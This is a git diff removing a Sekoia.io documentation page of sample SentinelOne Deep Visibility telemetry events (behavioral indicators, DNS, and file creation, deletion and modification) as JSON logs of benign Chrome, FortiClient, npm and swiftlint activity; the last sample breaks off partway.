-|`registry.value` | `keyword` | Name of the value written. | -|`source.address` | `keyword` | Source network address. | -|`source.ip` | `ip` | IP address of the source. | -|`source.port` | `long` | Port of the source. | -|`url.original` | `wildcard` | Unmodified original url as seen in the event source. | -|`user.id` | `keyword` | Unique identifier of the user. | -|`user.name` | `keyword` | Short name or login of the user. | - - - -For more information on the Intake Format, please find the code of the Parser, Smart Descriptions, and Supported Events [here](https://github.com/SEKOIA-IO/intake-formats/tree/main/SentinelOne/deep_visibility). \ No newline at end of file diff --git a/_shared_content/operations_center/integrations/generated/8c1bee36-d516-42f9-9b6f-a8e4dcac3d1d_sample.md b/_shared_content/operations_center/integrations/generated/8c1bee36-d516-42f9-9b6f-a8e4dcac3d1d_sample.md deleted file mode 100644 index feda8b8af3..0000000000 --- a/_shared_content/operations_center/integrations/generated/8c1bee36-d516-42f9-9b6f-a8e4dcac3d1d_sample.md +++ /dev/null @@ -1,2982 +0,0 @@ - -### Raw Events Samples - -In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. - - -=== "behavioral_indicators" - - - ```json - { - "meta": { - "uuid": "f63008e522ce40c9afd4348634b5ab3b", - "traceId": "01FFQB788MA7GG70KGC1DSQ6ZT", - "agentVersion": "S1-WIN/21.7.1.240", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19042", - "computerName": "LAPTOP-TECH20", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631797347671" - }, - "event_type": "behavioralIndicators", - "source": { - "node": { - "key": { - "value": "7DC20CD7D1BEDF9F" - } - }, - "executable": { - "node": { - "key": { - "value": "05893E5943D0005C" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1630573198477" - }, - "path": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "2465624", - "signature": { - "signed": { - "identity": "GOOGLE LLC", - "valid": {} - } - }, - "hashes": { - "sha1": "a82705f4f5d1408f7c14d16a9cbe26c509422b29", - "sha256": "07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff", - "md5": "a766188d75e570ea3f9b09fb9d82cb54" - }, - "fileLocation": "Local" - }, - "commandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1744,7600736140352570522,3112921143749416041,131072 --lang=fr --service-sandbox-type=icon_reader --mojo-platform-channel-handle=30744 /prefetch:8", - "fullPid": { - "pid": 19720, - "startTime": { - "millisecondsSinceEpoch": "1631797347668" - } - }, - "user": { - "name": "CORP\\user.name", - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6187" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "0D7A69B0C2C26E73" - } - }, - "executable": { - "node": { - "key": { - "value": "05893E5943D0005C" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1630573198477" - }, - "path": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "2465624", - "signature": { - "signed": { - "identity": "GOOGLE LLC", - "valid": {} - } - }, - "hashes": { - "sha1": "a82705f4f5d1408f7c14d16a9cbe26c509422b29", - "sha256": "07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff", - "md5": "a766188d75e570ea3f9b09fb9d82cb54" - }, - "fileLocation": "Local" - }, - "commandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"", - "fullPid": { - "pid": 26188, - "startTime": { - "millisecondsSinceEpoch": "1631516876708" - } - }, - "user": { - "name": "CORP\\user.name", - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6187" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "41CA3A862279A7BC" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Google Chrome", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "sessionId": 1, - "integrityLevel": "MEDIUM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "6B188EE5E8C5F24F" - } - }, - "counters": { - "modelChildProcess": 1804, - "osChildProcess": 1804, - "crossProcess": 590449, - "moduleLoad": 2112, - "fileCreation": 490788, - "fileDeletion": 466017, - "fileModification": 1403458, - "exeModification": 1, - "netConnOut": 12, - "registryModification": 1847, - "crossProcessDupThreadHandle": 5290, - "crossProcessDupProcessHandle": 585159, - "dnsLookups": 16 - } - }, - "excluded": "E_FALSE", - "name": "Google Chrome", - "root": "E_FALSE", - "subsystem": "SYS_WIN32", - "sessionId": 1, - "integrityLevel": "LOW", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "6B188EE5E8C5F24F" - } - }, - "counters": { - "moduleLoad": 70, - "registryModification": 1 - } - }, - "indicator": "WD109", - "metadata": "To Process[ Name: \"chrome.exe\", Pid: \"19720\", UID: \"7DC20CD7D1BEDF9F\", TrueContextID: \"6B188EE5E8C5F24F\", IntegrityLevel: \"Low\", RelationToSource: \"Child\" ], File Path: \"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"", - "category": "BI_EVASION", - "classification": "PUA", - "description": "Code injection to other process memory space during the target process' initialization", - "friendlyName": "PreloadInjection", - "tactics": [ - { - "name": "Defense Evasion", - "source": "MITRE", - "techniques": [ - { - "name": "T1055.012", - "link": "https://attack.mitre.org/techniques/T1055/012/" - } - ] - }, - { - "name": "Privilege Escalation", - "source": "MITRE", - "techniques": [ - { - "name": "T1055.012", - "link": "https://attack.mitre.org/techniques/T1055/012/" - } - ] - } - ], - "longDescription": "Code injection to other process memory space during the target process' initialization MITRE: Defense Evasion {T1055.012}, Privilege Escalation {T1055.012}" - } - ``` - - - -=== "event_dns" - - - ```json - { - "meta": { - "seqId": 35, - "uuid": "4d311e18709146cba8797a22e3c20762", - "traceId": "BA1BE2835D6E4FF7B023C72DCE8B3829", - "agentVersion": "S1-WIN/4.6.14.304", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19042", - "computerName": "LAPTOP-COM13", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1628516010404" - }, - "trueContext": { - "key": { - "value": "C20F3967ACBB2FE7" - } - }, - "source": { - "node": { - "key": { - "value": "87E0B0E05D9D6CC8" - } - }, - "executable": { - "node": { - "key": { - "value": "C8E88AA83F5B15B6" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1628149542879" - }, - "path": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "2442584", - "signature": { - "signed": { - "identity": "GOOGLE LLC", - "valid": {} - } - }, - "hashes": {}, - "fileLocation": "Local" - }, - "commandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1692,16822032697640791725,9639588106693567222,131072 --lang=fr --service-sandbox-type=none --mojo-platform-channel-handle=2056 /prefetch:8", - "fullPid": { - "pid": 13796, - "startTime": { - "millisecondsSinceEpoch": "1628515734223" - } - }, - "user": { - "name": "CLIENT\\t.Naohisa", - "sid": "S-1-5-21-1525252525-7987987987-1111111111-6174" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "BAE25D38782A6941" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Google Chrome", - "root": "E_FALSE", - "subsystem": "SYS_WIN32", - "sessionId": 11, - "integrityLevel": "MEDIUM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "C20F3967ACBB2FE7" - } - }, - "counters": { - "moduleLoad": 90, - "fileCreation": 45, - "fileDeletion": 19, - "fileModification": 101, - "netConnOut": 31, - "dnsLookups": 35 - } - }, - "query": "lh5.googleusercontent.com", - "results": "type: 5 googlehosted.l.googleusercontent.com;142.250.179.65;", - "event_type": "dns" - } - ``` - - - -=== "file_creation" - - - ```json - { - "meta": { - "seqId": 35, - "uuid": "4d311e18709146cba871111111111111", - "traceId": "BABABABABEEE43452345234523423423", - "agentVersion": "S1-WIN/2.2.11.333", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "88888", - "computerName": "LAPTOP-COM13", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "7474746212121" - }, - "trueContext": { - "key": { - "value": "CCC43343435EABDF" - } - }, - "source": { - "node": { - "key": { - "value": "BAE25D38782A6941" - } - }, - "executable": { - "node": { - "key": { - "value": "C8E88AA83F5B15B6" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1628149542456" - }, - "path": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "2442584", - "signature": { - "signed": { - "identity": "GOOGLE LLC", - "valid": {} - } - }, - "hashes": {}, - "fileLocation": "Local" - }, - "commandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"", - "fullPid": { - "pid": 14896, - "startTime": { - "millisecondsSinceEpoch": "1628515733321" - } - }, - "user": { - "name": "CORP\\user.name", - "sid": "S-1-5-21-6562365326-8585787878-2021012021-6543" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "03267F6915111A61" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Google Chrome", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "sessionId": 11, - "integrityLevel": "MEDIUM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "CCC43343435EABDF" - } - }, - "counters": { - "modelChildProcess": 25, - "osChildProcess": 25, - "crossProcess": 1610, - "moduleLoad": 245, - "fileCreation": 148, - "fileDeletion": 58, - "fileModification": 416, - "registryModification": 32, - "crossProcessDupThreadHandle": 20, - "crossProcessDupProcessHandle": 1590 - } - }, - "targetFile": { - "node": { - "key": { - "value": "737373ABCDEF7373" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1628515733666" - }, - "path": "C:\\Users\\user.name\\AppData\\Local\\Google\\Chrome\\User Data", - "owner": {}, - "isDir": "test_not_E_FALSE", - "hashes": {}, - "fileLocation": "Local" - }, - "event_type": "fileCreation" - } - ``` - - - -=== "file_creation2" - - - ```json - { - "meta": { - "seqId": 35, - "uuid": "4d311e18709146cba871111111111111", - "traceId": "BABABABABEEE43452345234523423423", - "agentVersion": "S1-WIN/2.2.11.333", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "88888", - "computerName": "LAPTOP-COM13", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "7474746212121" - }, - "trueContext": { - "key": { - "value": "CCC43343435EABDF" - } - }, - "source": { - "node": { - "key": { - "value": "BAE25D38782A6941" - } - }, - "executable": { - "node": { - "key": { - "value": "C8E88AA83F5B15B6" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1628149542654" - }, - "path": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "2442584", - "signature": { - "signed": { - "identity": "GOOGLE LLC", - "valid": {} - } - }, - "hashes": {}, - "fileLocation": "Local" - }, - "commandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"", - "fullPid": { - "pid": 14896, - "startTime": { - "millisecondsSinceEpoch": "1628515733932" - } - }, - "user": { - "name": "CORP\\user.name", - "sid": "S-1-5-21-6562365326-8585787878-2021012021-6543" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "03267F6915111A61" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Google Chrome", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "sessionId": 11, - "integrityLevel": "MEDIUM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "CCC43343435EABDF" - } - }, - "counters": { - "modelChildProcess": 25, - "osChildProcess": 25, - "crossProcess": 1610, - "moduleLoad": 245, - "fileCreation": 148, - "fileDeletion": 58, - "fileModification": 416, - "registryModification": 32, - "crossProcessDupThreadHandle": 20, - "crossProcessDupProcessHandle": 1590 - } - }, - "targetFile": { - "node": { - "key": { - "value": "737373ABCDEF7373" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "7474746212121" - }, - "path": "C:\\Users\\user.name\\AppData\\Local\\Google\\Chrome\\User Data\\98798798-bbb2-9898-aaaa-1212121212f.tmp", - "owner": {}, - "isDir": "E_FALSE", - "hashes": {}, - "fileLocation": "Local" - }, - "event_type": "fileCreation" - } - ``` - - - -=== "file_creation3" - - - ```json - { - "meta": { - "uuid": "123", - "traceId": "123", - "agentVersion": "S1-WIN/21.7.7.40005", - "osFamily": "windows", - "osName": "Windows Server 2019 Standard", - "osRevision": "17763", - "computerName": "123", - "machineType": "server", - "mgmtUrl": "https://foo.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1660727585201" - }, - "event_type": "fileCreation", - "trueContext": { - "key": { - "value": "CB18415B7D5C7DC1" - } - }, - "source": { - "node": { - "key": { - "value": "D65452060133453B" - } - }, - "executable": { - "node": { - "key": { - "value": "3EFA3EFA3EFA3EFA" - } - }, - "creationTime": {}, - "owner": {}, - "hashes": {} - }, - "fullPid": { - "pid": 22545, - "startTime": { - "millisecondsSinceEpoch": "1660727582129" - } - }, - "user": {}, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": {} - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Unknown file", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "sessionId": 4294967295, - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "CB18415B7D5C7DC1" - } - }, - "counters": { - "fileCreation": 3, - "fileModification": 6 - } - }, - "targetFile": { - "node": { - "key": { - "value": "39AD9E819F6BE850" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1660727585201" - }, - "path": "Anonymized Data", - "owner": {}, - "isDir": "E_FALSE", - "hashes": {}, - "fileLocation": "Local" - } - } - ``` - - - -=== "file_creation_missing_fields" - - - ```json - { - "timestamp": { - "millisecondsSinceEpoch": "1629899209700" - }, - "meta": { - "seqId": 45, - "uuid": "6ce43ff9d060310b37fb4eba7ad3c1f0f2d9a5ab", - "traceId": "E1A04C7727EB41E5A3D0FF068D4BE544", - "agentVersion": "S1-WIN/4.4.3.149", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19043", - "computerName": "LAPTOP-COM4", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "trueContext": { - "key": { - "value": "0506A768B8828E35" - } - }, - "source": { - "node": { - "key": { - "value": "2FFCA561EE506063" - } - }, - "executable": { - "node": { - "key": { - "value": "E4CD922E494CA3C5" - } - }, - "creationTime": {}, - "path": "C:\\Program Files\\Fortinet\\FortiClient\\FortiESNAC.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "4253328", - "hashes": {}, - "fileLocation": "Local" - }, - "commandLine": "FortiESNAC.exe -s FC_{73EFB30F-1CAD-4a7a-AE2E-150282B6CE25}_000018", - "fullPid": { - "pid": 6104, - "startTime": { - "millisecondsSinceEpoch": "1629878298032" - } - }, - "user": { - "name": "AUTORITE NT\\Syst\u00e8me", - "sid": "S-1-5-18" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "D3250A9CB211CC1E" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "FortiClient Network Access Control", - "root": "E_FALSE", - "subsystem": "SYS_WIN32", - "integrityLevel": "SYSTEM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "0506A768B8828E35" - } - }, - "counters": { - "moduleLoad": 1948, - "fileCreation": 647, - "fileDeletion": 647, - "fileModification": 2141, - "exeModification": 40, - "netConnOut": 203, - "registryModification": 654, - "dnsLookups": 30 - } - }, - "targetFile": { - "node": { - "key": { - "value": "4685AD1C6BC7D31D" - } - }, - "creationTime": {}, - "path": "C:\\Program Files\\Fortinet\\FortiClient\\large_data_upload\\0.bin", - "owner": {}, - "isDir": "E_FALSE", - "hashes": {}, - "fileLocation": "Local" - }, - "event_type": "fileCreation" - } - ``` - - - -=== "file_deletion" - - - ```json - { - "meta": { - "uuid": "f63008e522ce40c9afd4348634b5ab3b", - "traceId": "01FFJG3VW54HS5577EY3CY83M8", - "agentVersion": "S1-WIN/21.7.1.240", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19042", - "computerName": "LAPTOP-TECH20", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631634706079" - }, - "event_type": "fileDeletion", - "trueContext": { - "key": { - "value": "6B188EE5E8C5F24F" - } - }, - "source": { - "node": { - "key": { - "value": "0D7A69B0C2C26E73" - } - }, - "executable": { - "node": { - "key": { - "value": "05893E5943D0005C" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1630573198477" - }, - "path": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "2465624", - "signature": { - "signed": { - "identity": "GOOGLE LLC", - "valid": {} - } - }, - "hashes": { - "sha1": "a82705f4f5d1408f7c14d16a9cbe26c509422b29", - "sha256": "07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff", - "md5": "a766188d75e570ea3f9b09fb9d82cb54" - }, - "fileLocation": "Local" - }, - "commandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"", - "fullPid": { - "pid": 26188, - "startTime": { - "millisecondsSinceEpoch": "1631516876708" - } - }, - "user": { - "name": "CORP\\user.name", - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6187" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "41CA3A862279A7BC" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Google Chrome", - "root": "E_TRUE", - "subsystem": "SYS_WIN32", - "sessionId": 1, - "integrityLevel": "MEDIUM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "6B188EE5E8C5F24F" - } - }, - "counters": { - "modelChildProcess": 761, - "osChildProcess": 761, - "crossProcess": 332191, - "moduleLoad": 1177, - "fileCreation": 295369, - "fileDeletion": 282078, - "fileModification": 849997, - "netConnOut": 5, - "registryModification": 788, - "crossProcessDupThreadHandle": 2431, - "crossProcessDupProcessHandle": 329760, - "dnsLookups": 5 - } - }, - "targetFile": { - "node": { - "key": { - "value": "780E03EC9E64BBE3" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1631634705524" - }, - "path": "C:\\Users\\user.name.CORP\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\1ab01c3b969bd7dcc799e2be1a4ce60699f20543\\650d1e12-cd20-438f-8c15-b58c713de9c7\\todelete_429a860c9774094b_0_1.exe", - "owner": {}, - "isDir": "E_FALSE", - "hashes": {}, - "fileLocation": "Local" - } - } - ``` - - - -=== "file_deletion_linux" - - - ```json - { - "meta": { - "uuid": "185f2b1e-bdca-c6e2-91b0-520df717d799", - "traceId": "01GBM84F2S5AZQSP200MBDS22Q", - "agentVersion": "S1-LIN/22.2.2.2", - "osFamily": "linux", - "osName": "Linux", - "osRevision": "Amazon 2 4.14.246-187.474.amzn2.x86_64", - "computerName": "ip-1-1-1-1.eu-west-1.compute.internal", - "machineType": "server", - "mgmtUrl": "https://euce1-103.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1661758224333" - }, - "event_type": "fileModification", - "trueContext": { - "key": { - "value": "0f4c8c9c-7440-2977-64af-11505a86f00d" - } - }, - "source": { - "node": { - "key": { - "value": "0f4ca868-3233-c901-c895-a9716d0c7a59" - } - }, - "executable": { - "node": { - "key": { - "value": "0f4ca59e-5ecc-2161-c4e7-97ac79e4c629" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1630345715000" - }, - "path": "/var/lib/docker/overlay2/1e79e7ff2771c052345d2be00b589f2178e121fe1dc09610224a939e50329bc4/merged/usr/local/bin/node", - "pUnix": "0", - "owner": {}, - "sizeBytes": "48935408", - "signature": { - "unsigned": {} - }, - "isKernelModule": "E_FALSE", - "hashes": { - "sha1": "837e6fbd33802ec0d56ac1bb3754af0046c9a220" - }, - "fileLocation": "Local" - }, - "commandLine": " node /usr/local/bin/npm install", - "fullPid": { - "pid": 12322, - "startTime": { - "millisecondsSinceEpoch": "1661758222250" - } - }, - "user": { - "name": "root", - "sid": "3397" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "0f4ca51a-f789-1621-a626-2b1b1c4a93f0" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "node", - "root": "E_FALSE", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "0f4c8c9c-7440-2977-64af-11505a86f00d" - } - }, - "counters": { - "fileCreation": 537, - "fileDeletion": 272, - "fileModification": 545, - "netConnOut": 10 - } - }, - "file": { - "node": { - "key": { - "value": "0f4d14d9-ce0f-85db-b8b9-0b942faf064b" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1661758119966" - }, - "path": "/var/lib/docker/overlay2/1e79e7ff2771c052345d2be00b589f2178e121fe1dc09610224a939e50329bc4/merged/root/.npm/_cacache/index-v5/3c/ec/2c605585502b25aa623d9f0b23d9c5fdc4cd06218943b79686e4c58f953f", - "pUnix": "0", - "owner": {}, - "sizeBytes": "1347", - "signature": { - "unsigned": {} - }, - "isKernelModule": "E_FALSE", - "hashes": {}, - "fileLocation": "Local" - }, - "sizeBytes": "1347", - "isKernelModule": "E_FALSE", - "hashes": {}, - "oldHashes": { - "sha1": "da39a3ee5e6b4b0d3255bfef95601890afd80709" - } - } - ``` - - - -=== "file_deletion_osx" - - - ```json - { - "meta": { - "uuid": "81A8A777-22BD-5CF8-9BF1-FD05875D9CD5", - "traceId": "D9E5C5D4-33D7-43E1-AF54-4C70A938643D_1", - "agentVersion": "S1-MAC/22.2.3.6268", - "osFamily": "osx", - "osName": "OS X", - "osRevision": "12.5.1 (21G83)", - "computerName": "MAC12345678", - "machineType": "laptop", - "mgmtUrl": "https://euce1-103.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1661503902148" - }, - "event_type": "fileDeletion", - "trueContext": { - "key": { - "value": "DD4C9404-F0D8-4676-84A6-5AAE17DE60ED" - } - }, - "source": { - "node": { - "key": { - "value": "27902FA0-0C08-475E-81CA-26A092441368" - } - }, - "executable": { - "node": { - "key": { - "value": "1BF67724-45F1-4B37-AE75-33B8E8CB8717" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1658821170000" - }, - "path": "/Users/user.name/Library/Developer/Xcode/DerivedData/Styleguide-dpqerxvcypfzedayjbwgkzsoptsu/SourcePackages/artifacts/djij_build_tools_ios/SwiftLintBinary.artifactbundle/swiftlint-0.48.0-macos/bin/swiftlint", - "pUnix": "493", - "owner": { - "name": "user.name" - }, - "sizeBytes": "61090952", - "signature": { - "unsigned": {} - }, - "isKernelModule": "E_FALSE", - "hashes": { - "sha1": "88bd62f8a3ee159d4f4611b324073d1e56ef76de", - "sha256": "03298adf7dae5700891033ddeabecea7f5850fedefadfa9fa6ba389a38ba354f", - "md5": "7180a848026de2bef01fb7383bd03ba0" - }, - "fileLocation": "Local" - }, - "commandLine": "/Users/user.name/Library/Developer/Xcode/DerivedData/Styleguide-dpqerxvcypfzedayjbwgkzsoptsu/SourcePackages/artifacts/djij_build_tools_ios/SwiftLintBinary.artifactbundle/swiftlint-0.48.0-macos/bin/swiftlint lint --in-process-sourcekit --config /Users/user.name/Library/Developer/Xcode/DerivedData/Styleguide-dpqerxvcypfzedayjbwgkzsoptsu/SourcePackages/plugins/Styleguide.output/Styleguide/SwiftLintPlugin/swiftlint.yml /Users/user.name/Documents/Development/djij/djij_design_system_ios/Styleguide", - "fullPid": { - "pid": 6933, - "startTime": { - "millisecondsSinceEpoch": "1661503902034" - } - }, - "user": { - "name": "user.name" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "79B3CD05-F827-45CB-A898-B647D8409A3D" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "swiftlint", - "root": "E_FALSE", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "DD4C9404-F0D8-4676-84A6-5AAE17DE60ED" - } - } - }, - "targetFile": { - "node": { - "key": { - "value": "024A7D89-2663-48AF-9DF4-C95494454E37" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1661503902152" - }, - "path": "/private/var/folders/0p/64nt8k313tl8klsphkkcmcjm2rrkq9/T/TemporaryItems/NSIRD_swiftlint_sBHQwy/ff558ca8ac21977f6850e3a3a719ed4f.plist", - "owner": {}, - "isKernelModule": "E_FALSE", - "hashes": {} - } - } - ``` - - - -=== "file_modification" - - - ```json - { - "meta": { - "uuid": "f63008e522ce40c9afd4348634b5ab3b", - "traceId": "01FFJC477DKY75XNH1KZPNVR44", - "agentVersion": "S1-WIN/21.7.1.240", - "osFamily": "windows", - "osName": "Windows 10 Pro", - "osRevision": "19042", - "computerName": "LAPTOP-TECH20", - "machineType": "laptop", - "mgmtUrl": "https://euce1-110-nfr.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1631630506789" - }, - "event_type": "fileModification", - "trueContext": { - "key": { - "value": "6B188EE5E8C5F24F" - } - }, - "source": { - "node": { - "key": { - "value": "B3B1945F1C32FBE0" - } - }, - "executable": { - "node": { - "key": { - "value": "05893E5943D0005C" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1630573198477" - }, - "path": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "2465624", - "signature": { - "signed": { - "identity": "GOOGLE LLC", - "valid": {} - } - }, - "hashes": { - "sha1": "a82705f4f5d1408f7c14d16a9cbe26c509422b29", - "sha256": "07832d5f6344bd4d68376a6ca3c5baabb9cef7166a3752268e73fadffb07ddff", - "md5": "a766188d75e570ea3f9b09fb9d82cb54" - }, - "fileLocation": "Local" - }, - "commandLine": "\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1744,7600736140352570522,3112921143749416041,131072 --lang=fr --service-sandbox-type=none --mojo-platform-channel-handle=2092 /prefetch:8", - "fullPid": { - "pid": 17924, - "startTime": { - "millisecondsSinceEpoch": "1631516877934" - } - }, - "user": { - "name": "CORP\\user.name", - "sid": "S-1-5-21-3542462677-1213864171-2030164332-6187" - }, - "interactive": "E_FALSE", - "parent": { - "node": { - "key": { - "value": "0D7A69B0C2C26E73" - } - }, - "fullPid": { - "startTime": {} - } - }, - "excluded": "E_FALSE", - "name": "Google Chrome", - "root": "E_FALSE", - "subsystem": "SYS_WIN32", - "sessionId": 1, - "integrityLevel": "MEDIUM", - "isWow64": "E_FALSE", - "isRedirectedCommandProcessor": "E_FALSE", - "trueContext": { - "key": { - "value": "6B188EE5E8C5F24F" - } - }, - "counters": { - "moduleLoad": 237, - "fileCreation": 15609, - "fileDeletion": 10968, - "fileModification": 25519, - "netConnOut": 7312, - "dnsLookups": 5131 - } - }, - "file": { - "node": { - "key": { - "value": "11B30D7B6C017731" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "1631630506782" - }, - "path": "C:\\Users\\user.name.CORP\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\TransportSecurity", - "owner": {}, - "isDir": "E_FALSE", - "hashes": {}, - "fileLocation": "Local" - }, - "isKernelModule": "E_FALSE", - "hashes": {}, - "oldHashes": {} - } - ``` - - - -=== "file_modification2" - - - ```json - { - "meta": { - "uuid": "123", - "traceId": "123", - "agentVersion": "S1-WIN/21.7.7.40005", - "osFamily": "windows", - "osName": "Windows Server 2019 Datacenter", - "osRevision": "17763", - "computerName": "123", - "machineType": "server", - "mgmtUrl": "https://foo.sentinelone.net" - }, - "timestamp": { - "millisecondsSinceEpoch": "1660727671759" - }, - "event_type": "fileModification", - "trueContext": { - "key": { - "value": "07CF4F73FE08319F" - } - }, - "source": { - "node": { - "key": { - "value": "AB20B9FDBC53D9F5" - } - }, - "executable": { - "node": { - "key": { - "value": "5B336EB7F6C58E57" - } - }, - "creationTime": { - "millisecondsSinceEpoch": "18446732429235951616" - }, - "path": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", - "owner": {}, - "isDir": "E_FALSE", - "sizeBytes": "26624", - "signature": { - "signed": { - "identity": "MICROSOFT WINDOWS", - "valid": {} - } - }, - "hashes": { - "sha1": "447ec979c4b2c53c21b17bd9c2f7d67a9f967108", - "sha256": 